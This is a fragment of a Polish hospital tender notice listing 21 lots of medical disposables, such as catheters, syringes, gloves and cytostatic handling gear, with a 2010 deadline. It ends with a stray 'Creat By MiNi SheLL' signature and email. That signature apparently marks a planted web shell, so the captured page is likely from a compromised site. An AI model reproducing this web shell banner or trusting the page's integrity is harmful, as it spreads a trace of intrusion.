<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>szczegółowo opisane w załączniku nr 4 do siwz - projekcie umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.onkologia.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego: 43-300  Bielsko-Biała, ul. Wyzwolenia 18 (Budynek Dyrekcji - Komórka Zamówień Publicznych)    pisemnie w cenie 15zł +VAT, strona internetowa bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 10:00, miejsce: siedzibie Zamawiającego: 43-300  Bielsko-Biała, ul. Wyzwolenia 18 (Budynek Dyrekcji - Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W toku przedmiotowego postępowania o udzielenie zamówienia wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazywać będą pisemnie. Zamawiający dopuszcza również formę faksu pod warunkiem potwierdzenia go niezwłocznie pismem..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą cewniki, pakiet zawiera 17 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2A - Pojemniki do dobowej zbiórki moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą pojemniki do dobowej zbiórki moczu oraz worki do godzinowej zbiórki moczu sterylne, pakiet zawiera 2 pozycje, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 2B - Pojemniki do dobowej zbiórki moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi jednorazowa kaczka męska, pakiet zawiera 1 pozycje, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 2C - Wysokociśnieniowy system do drenażu chirurgicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi pojemnik z drenem, pojemnik bez drenu, pakiet zawiera 4 pozycje, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6, 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 3 - Igły, strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą igły, strzykawki, pakiet zawiera 12 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 3A - Strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą strzykawki, pakiet zawiera 1 pozycję, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 4 - Igły do nakłuć lędźwiowych typu SPINOCAN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą igły do nakłuć lędźwiowych typu SPINOCAN oraz Serifix Mini Spike Plus pakiet zawiera 5 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.23-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 5 - Kaniule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą kaniule oraz  bezigłowe porty do wielokrotnego wkłucia, pakiet zawiera 5 pozycje, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 6 - Przyrządy do przetaczania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą przyrządy do przetaczania, przedłużacze do pompy infuzyjnej pakiet zawiera 3 pozycje, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 6A - Przyrządy do przetaczania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą przyrządy do 24 godz. wlewów typu Exadrop, pakiet zawiera 1 pozycję, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 7 - Pojemniki na odpady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą pojemniki na odpady medyczne, pakiet zawiera 4 pozycje, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.23-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 8 - Odzież ochronna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi odzież ochronna, pakiet zawiera 8 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 9 - Rękawy foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą rękawy foliowo-papierowe, pakiet zawiera 6 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 10 - Podkłady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą podkłady, pakiet zawiera 3 pozycje, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 11 - Rękawiczki niejałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą rękawiczki zabiegowe lateksowe, rękawiczki foliowe jednorazowego użytku oraz rękawiczki diagnostyczne nitrylowe, pakiet zawiera 5 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 12 - Rękawiczki specjalistyczne, zabiegowe, nitrylowe, niejałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą rękawiczki specjalistyczne, zabiegowe, nitrylowe, niejałowe, pakiet zawiera 1 pozycję, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 13 - Rękawiczki lateksowe jałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą rękawiczki lateksowe jałowe, pakiet zawiera 5 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 14 - Rękawiczki lateksowe jałowe do pracy przy przygotowywaniu cytostatyków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzą rękawiczki lateksowe jałowe do pracy przy przygotowaniu cytostatyków, pakiet zawiera 1 pozycje, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 15 - Sprzęt jednorazowy stosowany do przygotowania leków cytostatycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi sprzęt jednorazowy stosowany do przygotowania leków cytostatycznych, pakiet zawiera 11 pozycji, które są szczegółowo opisane w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9, 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 16 - Odzież ochronna stosowana  do przygotowania cytostatyków - fartuchy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi fartuch jednorazowy, sterylny, pakiet zawiera 1 pozycję, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 17 - Odzież ochronna stosowana do przygotowania cytostatyków - ochraniacze na obuwie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi odzież ochronna stosowana do przygotowania cytostatyków, pakiet zawiera 1 pozycję, która jest szczegółowo opisana w załączniku nr 5 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com